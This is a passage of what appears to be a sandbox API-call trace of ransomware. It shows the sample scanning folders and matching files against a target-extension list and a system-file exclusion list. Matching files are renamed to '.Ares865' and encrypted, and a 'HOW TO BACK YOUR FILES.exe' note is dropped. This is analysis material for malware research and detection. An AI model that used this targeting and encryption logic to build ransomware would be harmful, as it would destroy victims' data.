lstrlenW (lpString="nv2") returned 3 [0065.250] lstrcmpiW (lpString1="txt", lpString2="nv2") returned 1 [0065.250] lstrlenW (lpString="nwdb") returned 4 [0065.250] lstrcmpiW (lpString1=".txt", lpString2="nwdb") returned -1 [0065.250] lstrlenW (lpString="nyf") returned 3 [0065.250] lstrcmpiW (lpString1="txt", lpString2="nyf") returned 1 [0065.250] lstrlenW (lpString="odb") returned 3 [0065.251] lstrcmpiW (lpString1="txt", lpString2="odb") returned 1 [0065.251] lstrlenW (lpString="odb") returned 3 [0065.251] lstrcmpiW (lpString1="txt", lpString2="odb") returned 1 [0065.251] lstrlenW (lpString="oqy") returned 3 [0065.251] lstrcmpiW (lpString1="txt", lpString2="oqy") returned 1 [0065.251] lstrlenW (lpString="ora") returned 3 [0065.251] lstrcmpiW (lpString1="txt", lpString2="ora") returned 1 [0065.251] lstrlenW (lpString="orx") returned 3 [0065.251] lstrcmpiW (lpString1="txt", lpString2="orx") returned 1 [0065.251] lstrlenW (lpString="owc") returned 3 [0065.251] lstrcmpiW (lpString1="txt", lpString2="owc") returned 1 [0065.251] lstrlenW (lpString="p96") returned 3 [0065.251] lstrcmpiW (lpString1="txt", lpString2="p96") returned 1 [0065.251] lstrlenW (lpString="p97") returned 3 [0065.251] lstrcmpiW (lpString1="txt", lpString2="p97") returned 1 [0065.251] lstrlenW (lpString="pan") returned 3 [0065.251] lstrcmpiW (lpString1="txt", lpString2="pan") returned 1 [0065.251] lstrlenW (lpString="pdb") returned 3 [0065.251] lstrcmpiW (lpString1="txt", lpString2="pdb") returned 1 [0065.251] lstrlenW (lpString="pdm") returned 3 [0065.251] lstrcmpiW (lpString1="txt", lpString2="pdm") returned 1 [0065.251] lstrlenW (lpString="pnz") returned 3 [0065.251] lstrcmpiW (lpString1="txt", lpString2="pnz") returned 1 [0065.251] lstrlenW (lpString="qry") returned 3 [0065.251] lstrcmpiW (lpString1="txt", lpString2="qry") returned 1 [0065.251] lstrlenW (lpString="qvd") returned 3 [0065.251] lstrcmpiW (lpString1="txt", lpString2="qvd") returned 1 [0065.251] lstrlenW (lpString="rbf") returned 3 [0065.251] lstrcmpiW (lpString1="txt", lpString2="rbf") returned 1 [0065.251] lstrlenW (lpString="rctd") returned 4 [0065.251] lstrcmpiW (lpString1=".txt", lpString2="rctd") returned -1 [0065.251] lstrlenW (lpString="rod") returned 3 [0065.251] lstrcmpiW (lpString1="txt", lpString2="rod") returned 1 [0065.251] lstrlenW (lpString="rodx") returned 4 [0065.251] lstrcmpiW (lpString1=".txt", lpString2="rodx") returned -1 [0065.251] lstrlenW (lpString="rpd") returned 3 [0065.251] lstrcmpiW (lpString1="txt", lpString2="rpd") returned 1 [0065.252] lstrlenW (lpString="rsd") returned 3 [0065.252] lstrcmpiW (lpString1="txt", lpString2="rsd") returned 1 [0065.252] lstrlenW (lpString="sas7bdat") returned 8 [0065.252] lstrcmpiW (lpString1="dlog.txt", lpString2="sas7bdat") returned -1 [0065.252] lstrlenW (lpString="sbf") returned 3 [0065.252] lstrcmpiW (lpString1="txt", lpString2="sbf") returned 1 [0065.252] lstrlenW (lpString="scx") returned 3 [0065.252] lstrcmpiW (lpString1="txt", lpString2="scx") returned 1 [0065.252] lstrlenW (lpString="sdb") returned 3 [0065.252] lstrcmpiW (lpString1="txt", lpString2="sdb") returned 1 [0065.252] lstrlenW (lpString="sdc") returned 3 [0065.252] lstrcmpiW (lpString1="txt", lpString2="sdc") returned 1 [0065.252] lstrlenW (lpString="sdf") returned 3 [0065.252] lstrcmpiW (lpString1="txt", lpString2="sdf") returned 1 [0065.252] lstrlenW (lpString="sis") returned 3 [0065.252] lstrcmpiW (lpString1="txt", lpString2="sis") returned 1 [0065.252] lstrlenW (lpString="spq") returned 3 [0065.252] lstrcmpiW (lpString1="txt", lpString2="spq") returned 1 [0065.252] lstrlenW (lpString="te") returned 2 [0065.252] lstrcmpiW (lpString1="xt", lpString2="te") returned 1 [0065.252] lstrlenW (lpString="teacher") returned 7 [0065.252] lstrcmpiW (lpString1="log.txt", lpString2="teacher") returned -1 [0065.252] lstrlenW (lpString="tmd") returned 3 [0065.252] lstrcmpiW (lpString1="txt", lpString2="tmd") returned 1 [0065.252] lstrlenW (lpString="tps") returned 3 [0065.252] lstrcmpiW (lpString1="txt", lpString2="tps") returned 1 [0065.252] lstrlenW (lpString="trc") returned 3 [0065.252] lstrcmpiW (lpString1="txt", lpString2="trc") returned 1 [0065.252] lstrlenW (lpString="trc") returned 3 [0065.252] lstrcmpiW (lpString1="txt", lpString2="trc") returned 1 [0065.252] lstrlenW (lpString="trm") returned 3 [0065.252] lstrcmpiW (lpString1="txt", lpString2="trm") returned 1 [0065.252] lstrlenW (lpString="udb") returned 3 [0065.252] lstrcmpiW (lpString1="txt", lpString2="udb") returned -1 [0065.252] lstrlenW (lpString="udl") returned 3 [0065.252] lstrcmpiW (lpString1="txt", lpString2="udl") returned -1 [0065.252] lstrlenW (lpString="usr") returned 3 [0065.253] lstrcmpiW (lpString1="txt", lpString2="usr") returned -1 [0065.253] lstrlenW (lpString="v12") returned 3 [0065.253] lstrcmpiW (lpString1="txt", lpString2="v12") returned -1 [0065.253] lstrlenW (lpString="vis") returned 3 [0065.253] lstrcmpiW (lpString1="txt", lpString2="vis") returned -1 [0065.253] lstrlenW (lpString="vpd") returned 3 [0065.253] lstrcmpiW (lpString1="txt", lpString2="vpd") returned -1 [0065.253] lstrlenW (lpString="vvv") returned 3 [0065.253] lstrcmpiW (lpString1="txt", lpString2="vvv") returned -1 [0065.253] lstrlenW (lpString="wdb") returned 3 [0065.253] lstrcmpiW (lpString1="txt", lpString2="wdb") returned -1 [0065.253] lstrlenW (lpString="wmdb") returned 4 [0065.253] lstrcmpiW (lpString1=".txt", lpString2="wmdb") returned -1 [0065.253] lstrlenW (lpString="wrk") returned 3 [0065.253] lstrcmpiW (lpString1="txt", lpString2="wrk") returned -1 [0065.253] lstrlenW (lpString="xdb") returned 3 [0065.253] lstrcmpiW (lpString1="txt", lpString2="xdb") returned -1 [0065.253] lstrlenW (lpString="xld") returned 3 [0065.253] lstrcmpiW (lpString1="txt", lpString2="xld") returned -1 [0065.253] lstrlenW (lpString="xmlff") returned 5 [0065.253] lstrcmpiW (lpString1="g.txt", lpString2="xmlff") returned -1 [0065.253] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\brndlog.txt.Ares865") returned 84 [0065.253] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\default user\\local settings\\microsoft\\internet explorer\\brndlog.txt"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\brndlog.txt.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\internet explorer\\brndlog.txt.ares865"), dwFlags=0x1) returned 1 [0065.254] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\brndlog.txt.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\internet explorer\\brndlog.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.254] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12201) returned 1 [0065.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.255] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.255] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.255] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.255] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x32b0, lpName=0x0) returned 0x118 [0065.257] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x32b0) returned 0x190000 [0065.258] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.259] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.259] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0065.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0065.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.259] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.259] CloseHandle (hObject=0x118) returned 1 [0065.259] CloseHandle (hObject=0x164) returned 1 [0065.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.260] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ab6e2e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.260] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.260] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ab6e2e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0065.260] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.260] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0065.260] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache" [0065.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1788 | out: hHeap=0x2b0000) returned 1 [0065.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0065.260] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache") returned 58 [0065.260] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache" [0065.260] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.260] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.261] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.261] GetLastError () returned 0x0 [0065.261] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.261] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.261] CloseHandle (hObject=0x12c) returned 1 [0065.261] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.261] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.261] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abba5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abba5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.261] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.261] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.261] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.261] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abba5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abba5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.261] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.261] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.262] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.262] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.262] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1NBUR4HR", cAlternateFileName="")) returned 1 [0065.262] lstrcmpiW (lpString1="1NBUR4HR", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.262] lstrcmpiW (lpString1="1NBUR4HR", lpString2="aoldtz.exe") returned -1 [0065.262] lstrcmpiW (lpString1="1NBUR4HR", lpString2=".") returned 1 [0065.262] lstrcmpiW (lpString1="1NBUR4HR", lpString2="..") returned 1 [0065.262] lstrcmpiW (lpString1="1NBUR4HR", lpString2="windows") returned -1 [0065.262] lstrcmpiW (lpString1="1NBUR4HR", lpString2="bootmgr") returned -1 [0065.262] lstrcmpiW (lpString1="1NBUR4HR", lpString2="temp") returned -1 [0065.262] lstrcmpiW (lpString1="1NBUR4HR", lpString2="pagefile.sys") returned -1 [0065.262] lstrcmpiW (lpString1="1NBUR4HR", lpString2="boot") returned -1 [0065.262] lstrcmpiW (lpString1="1NBUR4HR", lpString2="ids.txt") returned -1 [0065.262] lstrcmpiW (lpString1="1NBUR4HR", lpString2="ntuser.dat") returned -1 [0065.262] lstrcmpiW (lpString1="1NBUR4HR", lpString2="perflogs") returned -1 [0065.262] lstrcmpiW (lpString1="1NBUR4HR", lpString2="MSBuild") returned -1 [0065.262] lstrlenW (lpString="1NBUR4HR") returned 8 [0065.262] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\*") returned 60 [0065.262] lstrcpyW (in: lpString1=0x2cce476, lpString2="1NBUR4HR" | out: lpString1="1NBUR4HR") returned="1NBUR4HR" [0065.262] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0065.262] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e9eb0 [0065.262] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7cb0 [0065.262] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6ASVN7J7", cAlternateFileName="")) returned 1 [0065.262] lstrcmpiW (lpString1="6ASVN7J7", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.262] lstrcmpiW (lpString1="6ASVN7J7", lpString2="aoldtz.exe") returned -1 [0065.262] lstrcmpiW (lpString1="6ASVN7J7", lpString2=".") returned 1 [0065.262] lstrcmpiW (lpString1="6ASVN7J7", lpString2="..") returned 1 [0065.262] lstrcmpiW (lpString1="6ASVN7J7", lpString2="windows") returned -1 [0065.262] lstrcmpiW (lpString1="6ASVN7J7", lpString2="bootmgr") returned -1 [0065.262] lstrcmpiW (lpString1="6ASVN7J7", lpString2="temp") returned -1 [0065.262] lstrcmpiW (lpString1="6ASVN7J7", lpString2="pagefile.sys") returned -1 [0065.262] lstrcmpiW (lpString1="6ASVN7J7", lpString2="boot") returned -1 [0065.262] lstrcmpiW (lpString1="6ASVN7J7", lpString2="ids.txt") returned -1 [0065.262] lstrcmpiW (lpString1="6ASVN7J7", lpString2="ntuser.dat") returned -1 [0065.263] lstrcmpiW (lpString1="6ASVN7J7", lpString2="perflogs") returned -1 [0065.263] lstrcmpiW (lpString1="6ASVN7J7", lpString2="MSBuild") returned -1 [0065.263] lstrlenW (lpString="6ASVN7J7") returned 8 [0065.263] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR") returned 67 [0065.263] lstrcpyW (in: lpString1=0x2cce476, lpString2="6ASVN7J7" | out: lpString1="6ASVN7J7") returned="6ASVN7J7" [0065.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0065.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e9d00 [0065.263] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7c30 [0065.263] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D68G7BIJ", cAlternateFileName="")) returned 1 [0065.263] lstrcmpiW (lpString1="D68G7BIJ", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.263] lstrcmpiW (lpString1="D68G7BIJ", lpString2="aoldtz.exe") returned 1 [0065.263] lstrcmpiW (lpString1="D68G7BIJ", lpString2=".") returned 1 [0065.263] lstrcmpiW (lpString1="D68G7BIJ", lpString2="..") returned 1 [0065.263] lstrcmpiW (lpString1="D68G7BIJ", lpString2="windows") returned -1 [0065.263] lstrcmpiW (lpString1="D68G7BIJ", lpString2="bootmgr") returned 1 [0065.263] lstrcmpiW (lpString1="D68G7BIJ", lpString2="temp") returned -1 [0065.263] lstrcmpiW (lpString1="D68G7BIJ", lpString2="pagefile.sys") returned -1 [0065.263] lstrcmpiW (lpString1="D68G7BIJ", lpString2="boot") returned 1 [0065.263] lstrcmpiW (lpString1="D68G7BIJ", lpString2="ids.txt") returned -1 [0065.263] lstrcmpiW (lpString1="D68G7BIJ", lpString2="ntuser.dat") returned -1 [0065.263] lstrcmpiW (lpString1="D68G7BIJ", lpString2="perflogs") returned -1 [0065.263] lstrcmpiW (lpString1="D68G7BIJ", lpString2="MSBuild") returned -1 [0065.263] lstrlenW (lpString="D68G7BIJ") returned 8 [0065.263] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7") returned 67 [0065.263] lstrcpyW (in: lpString1=0x2cce476, lpString2="D68G7BIJ" | out: lpString1="D68G7BIJ") returned="D68G7BIJ" [0065.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0065.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e9e20 [0065.263] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2268 | out: ListHead=0x2e7710, ListEntry=0x2d2268) returned 0x2d2248 [0065.263] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe9e3d85, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0065.263] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.263] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0065.263] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0065.263] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0065.263] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0065.263] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0065.264] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0065.264] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0065.264] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0065.264] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0065.264] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0065.264] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0065.264] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0065.264] lstrlenW (lpString="desktop.ini") returned 11 [0065.264] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ") returned 67 [0065.264] lstrcpyW (in: lpString1=0x2cce476, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0065.264] lstrlenW (lpString="desktop.ini") returned 11 [0065.264] lstrlenW (lpString="Ares865") returned 7 [0065.264] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0065.264] lstrlenW (lpString=".dll") returned 4 [0065.264] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0065.264] lstrlenW (lpString=".lnk") returned 4 [0065.264] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0065.264] lstrlenW (lpString=".ini") returned 4 [0065.264] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0065.264] lstrlenW (lpString=".sys") returned 4 [0065.264] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0065.264] lstrlenW (lpString="desktop.ini") returned 11 [0065.264] lstrlenW (lpString="bak") returned 3 [0065.264] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0065.264] lstrlenW (lpString="ba_") returned 3 [0065.264] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0065.264] lstrlenW (lpString="dbb") returned 3 [0065.264] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0065.264] lstrlenW (lpString="vmdk") returned 4 [0065.264] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0065.264] lstrlenW (lpString="rar") returned 3 [0065.264] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0065.265] lstrlenW (lpString="zip") returned 3 [0065.265] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0065.265] lstrlenW (lpString="tgz") returned 3 [0065.265] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0065.265] lstrlenW (lpString="vbox") returned 4 [0065.265] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0065.265] lstrlenW (lpString="vdi") returned 3 [0065.265] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0065.265] lstrlenW (lpString="vhd") returned 3 [0065.265] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0065.265] lstrlenW (lpString="vhdx") returned 4 [0065.265] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0065.265] lstrlenW (lpString="avhd") returned 4 [0065.265] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0065.265] lstrlenW (lpString="db") returned 2 [0065.265] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0065.265] lstrlenW (lpString="db2") returned 3 [0065.265] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0065.265] lstrlenW (lpString="db3") returned 3 [0065.265] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0065.265] lstrlenW (lpString="dbf") returned 3 [0065.265] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0065.265] lstrlenW (lpString="mdf") 